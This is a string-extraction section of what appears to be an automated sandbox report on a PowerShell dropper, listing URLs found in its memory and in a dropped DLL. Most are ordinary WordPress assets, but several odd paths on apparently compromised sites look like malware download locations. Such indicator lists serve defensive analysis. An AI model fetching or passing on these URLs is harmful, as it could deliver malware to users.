Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.6.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.6.2/wp-includes/js/mediaelement/wp-mediaelement.min.css
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/p/woocommerce/9.3.3/assets/client/blocks/wc-blocks.css
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/p/woocommerce/9.3.3/assets/css/woocommerce-layout.css
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/p/woocommerce/9.3.3/assets/css/woocommerce-smallscreen.css
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/p/woocommerce/9.3.3/assets/css/woocommerce.css
Source: powershell.exe, 00000005.00000002.477673890.000000000308A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/p/woocommerce/9.3.3/assets/js/frontend/order-attribution.min.js
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/p/woocommerce/9.3.3/assets/js/frontend/woocommerce.min.js
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/p/woocommerce/9.3.3/assets/js/jquery-blockui/jquery.blockUI.min.js
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/p/woocommerce/9.3.3/assets/js/js-cookie/js.cookie.min.js
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/p/woocommerce/9.3.3/assets/js/sourcebuster/sourcebuster.min.js
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.0.0/animate.compat.css
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/2.0.1/TweenMax.min.js
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/smoothscroll/1.4.10/SmoothScroll.min.js
Source: powershell.exe, 00000005.00000002.480991589.0000000012241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.480991589.0000000012241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.480991589.0000000012241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.477673890.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://datasits.com
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?feed=comments-rss2
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?feed=rss2
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=1067
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=1130
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=1229
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=1518
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=1763
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=1833
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=1883
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=1921
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=405
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/?page_id=788
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/index.php?rest_route=%2Foembed%2F1.0%2Fembed&url=https%3A%2F%2Fdatasits.co
Source: powershell.exe, 00000009.00000002.511859762.000000000281B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/index.php?rest_route=/
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/index.php?rest_route=/elementskit/v1/
Source: powershell.exe, 00000009.00000002.511859762.000000000281B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/index.php?rest_route=/wp/v2/pages/9
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/css/conditionals/apple-webkit.min.css?ver=3
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css?ver=3.24.
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.24.3
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/css/widget-google_maps.min.css?ver=3.24.3
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/css/widget-heading.min.css?ver=3.24.3
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/css/widget-image.min.css?ver=3.24.3
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/css/widget-social-icons.min.css?ver=3.24.3
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/css/widget-spacer.min.css?ver=3.24.3
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/css/widget-text-editor.min.css?ver=3.24.3
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.24.3
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.24.3
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.24.3
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/lib/animations/styles/fadeIn.min.css?ver=3.
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.1
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ve
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementskit-lite/libs/framework/assets/js/frontend-script.js
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ek
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?ver=
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.css?v
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/animate-circle.min.j
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/elementor.js?ver=3.2
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/widget-scripts.js?ve
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.c
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.42
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=1.6
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.8.1
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=4.8.1
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=4.8.1
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Data-Square-for-IT-Solutions-1024x239.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Data-Square-for-IT-Solutions-1536x359.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Data-Square-for-IT-Solutions-300x70.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Data-Square-for-IT-Solutions-768x179.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Data-Square-for-IT-Solutions.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Quality-150x150.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Quality-300x300.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Quality.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Values-150x150.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Values-300x300.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/Values.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/bussiness-man-150x150.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/bussiness-man-300x300.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/bussiness-man.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/cropped-Data-Square-Site-Icon-and-Commercial-Media-I
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/man-150x150.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/man-300x300.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/man.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/teamwork-150x150.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/teamwork-300x300.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/teamwork.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/vision-150x150.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/vision-300x300.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/vision.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/woman-150x150.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/woman-300x300.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2022/09/woman.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-1024x315.png
Source: powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-300x92.png
Source: powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2023/02/Team-Work-1-768x236.png
Source: powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/2023/02/Team-Work-1.png
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/elementor/css/global.css?ver=1726776444
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/elementor/css/post-8.css?ver=1726776442
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-content/uploads/elementor/css/post-9.css?ver=1726776710
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://datasits.com/wp-includes/Zkj4QO/
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
Source: vbkwk.dll.5.dr	String found in binary or memory: https://datasits.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.477673890.000000000335C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.000000000299A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://daujimaharajmandir.org
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://daujimaharajmandir.org/wp-includes/63De/
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Poppins%3A400%2C700&display=swap&ver=6.6.2
Source: vbkwk.dll.5.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
Source: vbkwk.dll.5.dr	String found in binary or memory: https://fonts.gstatic.com/
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://gmpg.org/xfn/11
Source: vbkwk.dll.5.dr	String found in binary or memory: https://maps.google.com/maps?q=Iraq&t=m&z=5&output=embed&iwloc=near
Source: powershell.exe, 00000005.00000002.480991589.0000000012241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pardiskood.com
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pardiskood.com/wp-content/NR/
Source: powershell.exe, 00000005.00000002.477673890.0000000003096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://parkinsons.co.in
Source: powershell.exe, 00000005.00000002.477673890.0000000002EB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002842000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://parkinsons.co.in/abc/Y6Y0fTbUEg6/
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://schema.org
Source: vbkwk.dll.5.dr	String found in binary or memory: https://schema.org/SiteNavigationElement
Source: powershell.exe, 00000009.00000002.511859762.0000000002992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://schema.org/WPFooter
Source: vbkwk.dll.5.dr	String found in binary or memory: https://schema.org/WPHeader
Source: vbkwk.dll.5.dr	String found in binary or memory: https://schema.org/WebPage
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.481718749.000000001C558000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C447000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000005.00000002.477673890.000000000308A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stats.wp.com/e-202445.js
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stats.wp.com/s-202445.js
Source: powershell.exe, 00000005.00000002.477673890.0000000002EB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002752000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/#/schema/logo/image/
Source: powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/#organization
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/#website
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/?s=
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/become-a-partner/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/blog/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/careers/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/contacts/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/integrations/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/modules/digital-catalog/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/modules/digital-showroom-and-3d-sample-virtualization/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/modules/line-planning/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/modules/merchandizing/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/modules/orders-collection-and-management/
Source: powershell.exe, 00000005.00000002.477673890.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.00000000027FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trasix.com/our-story/
